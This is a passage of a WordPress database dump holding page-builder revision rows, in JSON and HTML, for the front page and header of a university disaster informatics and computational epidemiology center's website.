service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"Impact assessment<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 18:36:34','2022-02-16 18:36:34','',168,'https://gsudice.dataconn.net/?p=402',0,'revision','',0),(403,1,'2022-02-16 18:36:34','2022-02-16 18:36:34','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"20-c30\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-335 style-local-20-c30 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-336-outer style-local-20-c31-outer\">\n            <div data-colibri-id=\"20-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-336 style-local-20-c31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-337-outer style-local-20-c32-outer\">\n            <div data-colibri-id=\"20-c32\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-337 style-local-20-c32 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"20-c26\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-331 style-local-20-c26 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-333-outer style-local-20-c28-outer\">\n            <div data-colibri-id=\"20-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-333 style-local-20-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c29\" class=\"h-global-transition-all h-heading style-334 style-local-20-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-334 style-local-20-c29\">\n                    <!---->\n                    <!---->\n                    <h1 class=\"\">Focus Areas</h1>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n            <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n                <div\n                  data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c6\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">disease &amp; disaster modeling</h5>\n                  </div>\n              </div>\n              <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n                <!---->\n                <!---->\n                <div class=\"\">\n                  <p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities</p>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n          <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n            <!---->\n            <!---->\n            <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n              <!---->\n              <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n                <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n              <div\n                data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n                <!---->\n                <div class=\"h-heading__outer style-275 style-local-20-c10\">\n                  <!---->\n                  <!---->\n                  <h5 class=\"\">data as a service</h5>\n                </div>\n            </div>\n            <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure</p>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n        <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n              <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n            <div\n              data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n              <!---->\n              <div class=\"h-heading__outer style-275 style-local-20-c14\">\n                <!---->\n                <!---->\n                <h5 class=\"\">Impact assessment</h5>\n              </div>\n          </div>\n          <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n            <!---->\n            <!---->\n            <div class=\"\">\n              <p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups</p>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 18:36:34','2022-02-16 18:36:34','',20,'https://gsudice.dataconn.net/?p=403',0,'revision','',0),(404,1,'2022-02-16 18:36:34','2022-02-16 18:36:34','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>&copy; 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics &amp; Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment &amp; Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 18:36:34','2022-02-16 18:36:34','',23,'https://gsudice.dataconn.net/?p=404',0,'revision','',0),(405,1,'2022-02-16 18:36:34','2022-02-16 18:36:34','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n                <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n                <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n                          <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-255-outer 